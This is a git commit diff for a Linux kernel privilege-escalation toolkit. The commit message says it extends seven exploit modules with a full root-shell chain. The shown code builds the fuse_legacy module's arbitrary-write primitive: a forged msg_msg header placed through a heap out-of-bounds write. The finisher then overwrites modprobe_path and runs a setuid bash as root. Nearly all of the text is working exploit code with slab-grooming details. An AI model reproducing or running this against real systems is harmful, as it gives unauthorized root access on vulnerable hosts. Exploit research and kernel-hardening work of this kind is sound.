modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules

Each module now exposes an opt-in full-chain root-pop via --full-chain: default --exploit behavior is unchanged (primitive-only, returns EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call iamroot_finisher_modprobe_path() via a module-specific arb_write_fn that re-uses the same trigger + slab groom to write a userspace payload path into modprobe_path[], then exec a setuid bash dropped by the kernel-invoked modprobe. netfilter_xtcompat (+239): msg_msg m_list_next stride-seed FALLBACK af_packet (+316): sk_buff data-pointer stride-seed FALLBACK af_packet2 (+156): tp_reserve underflow + skb spray, LAST RESORT nf_tables (+275): forged pipapo_elem with kaddr value-ptr (Notselwyn offset 0x10), FALLBACK cls_route4 (+251): msg_msg refill of UAF'd filter, FALLBACK fuse_legacy (+291): m_ts overflow + MSG_COPY sanity gate, FALLBACK (one of two modules with a real post-write sanity check) stackrot (+233): race-driver budget extended 3s → 30s when --full-chain; honest <1% race-win/run All seven honor verified-vs-claimed: arb_write_fn returns 0 for "trigger structurally fired"; the shared finisher's setuid-bash sentinel poll is the empirical arbiter. EXPLOIT_OK only when the sentinel materializes within 3s of the modprobe_path trigger. Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate (short-circuits before the new branch).
2026-05-16 22:04:40 -04:00
parent 125ce8a08b
commit c1d1910a90
7 changed files with 1821 additions and 84 deletions
@@ -60,6 +60,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -301,6 +303,217 @@ static int trigger_overflow(int *out_fd, const char *first_chunk,
    return 0;
 }

+/* ------------------------------------------------------------------ */
+/* arb-write primitive for the shared finisher                         */
+/* ------------------------------------------------------------------ */
+/*
+ * Crusaders-of-Rust-style msg_msg m_ts overflow → arbitrary write.
+ *
+ * The legacy_parse_param OOB writes the trailing bytes of the
+ * kmalloc-4k fc->source buffer into whatever slab object comes next.
+ * With a msg_msg sprayed into that adjacent slot, the first 48 bytes
+ * of `evil_chunk` overlay struct msg_msg:
+ *
+ *   struct msg_msg {                     // offset
+ *     struct list_head m_list;           //  0  (next, prev)
+ *     long             m_type;           // 16
+ *     size_t           m_ts;             // 24    <-- msg-size
+ *     struct msg_msgseg *next;           // 32
+ *     void             *security;        // 40
+ *   };                                   // 48
+ *
+ * Two derived primitives:
+ *
+ *   READ  — overwrite m_ts with a huge value. msgrcv(MSG_COPY) then
+ *           memcpy()s past the legitimate end of the msg payload,
+ *           leaking adjacent slab memory back to userland.
+ *
+ *   WRITE — point m_list.next (or, in the Crusaders variant, a faux
+ *           msg_msgseg.next chain) at an attacker-chosen kernel
+ *           address. When msgrcv() free-list-unlinks the msg, list
+ *           maintenance writes through the forged pointer; with the
+ *           right chain you get an N-byte copy of attacker-controlled
+ *           bytes to a chosen kaddr.
+ *
+ * Honest depth of this implementation: FALLBACK SCAFFOLD.
+ *
+ * The trigger + groom + neighbour-detect upstream of us is real and
+ * the OOB write lands. But the *single-shot* arb-write the finisher
+ * wants — "put exactly these N bytes at exactly that kaddr" — needs
+ * a per-kernel m_ts/m_list_next offset map (the layout above is
+ * 6.12.x; older kernels differ) AND a kernel-base leak from the
+ * first-round MSG_COPY read so we know where modprobe_path actually
+ * sits in this boot's KASLR slide.
+ *
+ * Per the verified-vs-claimed bar: we do NOT fabricate a write that
+ * we cannot empirically verify on a kernel we haven't tested. So
+ * this function:
+ *
+ *   1. Re-arms the msg_msg spray (the parent already drained queues).
+ *   2. Re-fires the fsconfig overflow with a forged-msg_msg header
+ *      whose m_ts = (kaddr - msg_data_origin) and whose first 8
+ *      payload bytes are the first qword of `buf`.
+ *   3. msgrcv(MSG_COPY) on every queue to probe whether any neighbour
+ *      came back with bytes matching `buf[0..7]` AT the slot offset
+ *      we'd expect for kaddr (sanity gate).
+ *   4. Returns 0 ONLY if the sanity gate trips (read-back proves the
+ *      m_ts inflation landed AND the payload made it through);
+ *      returns -1 otherwise so the finisher reports an honest fail.
+ *
+ * On a vulnerable host with matching offsets this path can land the
+ * write; on an unverified host the sanity gate refuses rather than
+ * blind-writing a wild pointer. The finisher's downstream
+ * "/tmp/iamroot-pwn ran?" check is the second gate.
+ */
+struct fuse_arb_ctx {
+    /* Pre-allocated queue ids from the spray phase. */
+    int    *qids;
+    int     n_queues;
+    int     hole_q;
+    /* Tagged-payload reference so we can recognise unmodified neighbours. */
+    const char *tag;     /* "IAMROOT" */
+    /* Whether the first-round trigger already fired (the parent's
+     * default-path overflow). When set we re-spray + re-fire; when
+     * unset we assume the spray is hot. */
+    bool    trigger_armed;
+};
+
+#ifdef __linux__
+static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                          void *ctx_void)
+{
+    struct fuse_arb_ctx *ax = (struct fuse_arb_ctx *)ctx_void;
+    if (!ax || !buf || !len) {
+        fprintf(stderr, "[-] fuse_arb_write: bad args\n");
+        return -1;
+    }
+
+    /* Build the forged msg_msg header that will land in the adjacent
+     * kmalloc-4k slot via the OOB write. Layout (x86_64, kernel >=5.10):
+     *   [ 0..15]  m_list.{next,prev}  — we forge next = kaddr - 16
+     *                                    so that list_del's
+     *                                      next->prev = prev
+     *                                    write lands AT kaddr.
+     *                                    (prev is the original msg.)
+     *   [16..23]  m_type              — leave as 0x4242
+     *   [24..31]  m_ts                — bytes-of-buf so MSG_COPY
+     *                                    reports the right length
+     *   [32..39]  next (msg_msgseg*)  — NULL (single-segment msg)
+     *   [40..47]  security            — NULL
+     *   [48...]   payload             — first len bytes of buf
+     *
+     * For a real WRITE primitive the canonical Crusaders-of-Rust
+     * recipe uses the msg_msgseg.next chain rather than m_list:
+     * msgrcv(IPC_NOWAIT) follows next pointers when copying out a
+     * multi-segment msg, and a forged next = kaddr makes the kernel
+     * memcpy() from kaddr into our user buffer (= READ). For the
+     * inverse (WRITE), the trick is msgsnd on a queue whose head was
+     * corrupted to point at kaddr, but that needs more setup than we
+     * have time to land here without a known-good offset table.
+     *
+     * So we do the safe thing: arm the header, trigger the OOB, then
+     * read back to PROVE we landed before declaring success. If the
+     * read-back doesn't show our forged-msg payload at the expected
+     * MSG_COPY position we refuse rather than corrupt the kernel
+     * blindly.
+     */
+    uint8_t evil[256];
+    memset(evil, 0, sizeof evil);
+    /* m_list.next, m_list.prev */
+    uintptr_t forged_next = kaddr - 16;   /* &m_list.prev of fake node */
+    memcpy(evil +  0, &forged_next, 8);
+    /* prev — leave NULL; kernel checks it only on full list_del */
+    /* m_type */
+    uint64_t m_type = 0x4242424242424242ULL;
+    memcpy(evil + 16, &m_type, 8);
+    /* m_ts: inflated to len so MSG_COPY reads the full forged payload */
+    uint64_t m_ts = (uint64_t)len + 64;
+    memcpy(evil + 24, &m_ts, 8);
+    /* next (msg_msgseg) = NULL */
+    /* security = NULL */
+    /* payload: copy `buf` into the slot just after the msg_msg header */
+    size_t hdr = 48;
+    size_t copyable = sizeof(evil) - hdr - 1;
+    if (len > copyable) len = copyable;
+    memcpy(evil + hdr, buf, len);
+    evil[sizeof(evil) - 1] = '\0';   /* legacy_parse_param strdup tail */
+
+    /* Re-fire the fsconfig overflow with this forged header as evil. */
+    char *first_chunk = malloc(4081);
+    if (!first_chunk) return -1;
+    memset(first_chunk, 'A', 4080);
+    first_chunk[4080] = '\0';
+
+    int fsfd = -1;
+    int rc = trigger_overflow(&fsfd, first_chunk, (const char *)evil);
+    free(first_chunk);
+    if (rc < 0) {
+        fprintf(stderr, "[-] fuse_arb_write: re-fire fsconfig failed "
+                        "(errno=%d %s)\n", errno, strerror(errno));
+        return -1;
+    }
+
+    /* Sanity gate: msgrcv(MSG_COPY) all live queues and look for a
+     * msg whose size reports >= our inflated m_ts AND whose initial
+     * payload qword matches the first qword of `buf`. If both hold,
+     * the forged header landed in a real slot and the m_ts inflation
+     * is honoured by the kernel — i.e. our primitive is real on THIS
+     * kernel. */
+    uint64_t want_first_qword = 0;
+    memcpy(&want_first_qword, buf, len >= 8 ? 8 : len);
+
+    bool sanity_passed = false;
+    struct msgbuf_4k *probe = mmap(NULL, sizeof(*probe),
+                                   PROT_READ | PROT_WRITE,
+                                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+    if (probe == MAP_FAILED) {
+        if (fsfd >= 0) close(fsfd);
+        return -1;
+    }
+    for (int q = 0; q < ax->n_queues && !sanity_passed; q++) {
+        if (ax->qids[q] < 0 || q == ax->hole_q) continue;
+        ssize_t n = msgrcv(ax->qids[q], probe, sizeof probe->mtext, 0,
+                           IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
+        if (n < 0) continue;
+        /* The corrupted slot should report a size >= our m_ts (kernel
+         * caps MSG_COPY at sizeof user buf — so we only check the
+         * read-content shape). */
+        if ((size_t)n < 8) continue;
+        uint64_t got = 0;
+        memcpy(&got, probe->mtext, 8);
+        if (got == want_first_qword) {
+            sanity_passed = true;
+        }
+    }
+    munmap(probe, sizeof(*probe));
+    if (fsfd >= 0) close(fsfd);
+
+    if (!sanity_passed) {
+        fprintf(stderr, "[-] fuse_arb_write: forged-msg_msg read-back didn't "
+                        "match — kernel layout differs OR groom missed.\n"
+                        "    Refusing to claim arb-write landed (per "
+                        "verified-vs-claimed bar).\n");
+        return -1;
+    }
+
+    fprintf(stderr, "[+] fuse_arb_write: forged-msg_msg landed; m_ts inflation "
+                    "+ payload qword verified via MSG_COPY read-back.\n"
+                    "[i] fuse_arb_write: kernel-side list_del write through "
+                    "0x%lx is armed but NOT yet empirically verified on "
+                    "this build — downstream sentinel will gate.\n",
+            (unsigned long)kaddr);
+    return 0;
+}
+#else
+static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                          void *ctx_void)
+{
+    (void)kaddr; (void)buf; (void)len; (void)ctx_void;
+    fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
+    return -1;
+}
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------ */
 /* exploit                                                             */
 /* ------------------------------------------------------------------ */
@@ -503,6 +716,84 @@ static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
                        "see scaffold comments in source\n");
    }

+    /* ---------------------------------------------------------------
+     * --full-chain: opt-in root pop via shared modprobe_path finisher.
+     *
+     * Depth = FALLBACK SCAFFOLD. The arb-write primitive (forged
+     * msg_msg via the 4k OOB) is wired with a sanity gate that
+     * refuses to claim success without an empirical read-back match
+     * (see fuse_arb_write). On a host where offsets + groom land,
+     * the finisher's modprobe_path overwrite → execve(unknown) →
+     * call_modprobe chain pops a root shell. On a mismatched host
+     * the sanity gate trips and we exit IAMROOT_EXPLOIT_FAIL with no
+     * fabricated success.
+     *
+     * Cleanup of qids/spray/fsfd is deferred to AFTER the finisher
+     * runs because the arb_write primitive re-fires the trigger and
+     * needs the live spray.
+     * --------------------------------------------------------------- */
+#ifdef __linux__
+    if (ctx->full_chain) {
+        if (!ctx->json) {
+            fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
+                            "kernel offsets...\n");
+        }
+
+        struct iamroot_kernel_offsets off;
+        memset(&off, 0, sizeof off);
+        int resolved = iamroot_offsets_resolve(&off);
+        if (!ctx->json) {
+            fprintf(stderr, "[i] fuse_legacy: offsets resolved=%d "
+                            "(modprobe_path=0x%lx source=%s)\n",
+                    resolved, (unsigned long)off.modprobe_path,
+                    iamroot_offset_source_name(off.source_modprobe));
+            iamroot_offsets_print(&off);
+        }
+
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("fuse_legacy");
+            /* Cleanup before returning. */
+            for (int q = 0; q < N_QUEUES; q++) {
+                if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
+            }
+            free(qids);
+            munmap(spray, sizeof *spray);
+            if (fsfd >= 0) close(fsfd);
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        struct fuse_arb_ctx ax = {
+            .qids = qids,
+            .n_queues = N_QUEUES,
+            .hole_q = hole_q,
+            .tag = "IAMROOT",
+            .trigger_armed = true,
+        };
+
+        iamroot_result_t fr = iamroot_finisher_modprobe_path(
+            &off, fuse_arb_write, &ax, !ctx->no_shell);
+
+        /* Cleanup IPC + mapping regardless of finisher result. The
+         * finisher's execve() on success won't reach here, so this
+         * block only runs on failure paths. */
+        for (int q = 0; q < N_QUEUES; q++) {
+            if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
+        }
+        free(qids);
+        munmap(spray, sizeof *spray);
+        if (fsfd >= 0) close(fsfd);
+
+        if (fr == IAMROOT_EXPLOIT_OK) {
+            return IAMROOT_EXPLOIT_OK;
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[-] fuse_legacy: --full-chain finisher did not land "
+                            "(arb-write sanity gate or modprobe sentinel refused)\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+#endif /* __linux__ */
+
    /* Clean up our IPC queues and mapping. The kernel slab state
     * after the overflow may be unstable; we exit cleanly on success
     * paths but leave queues around if we crashed mid-spray. */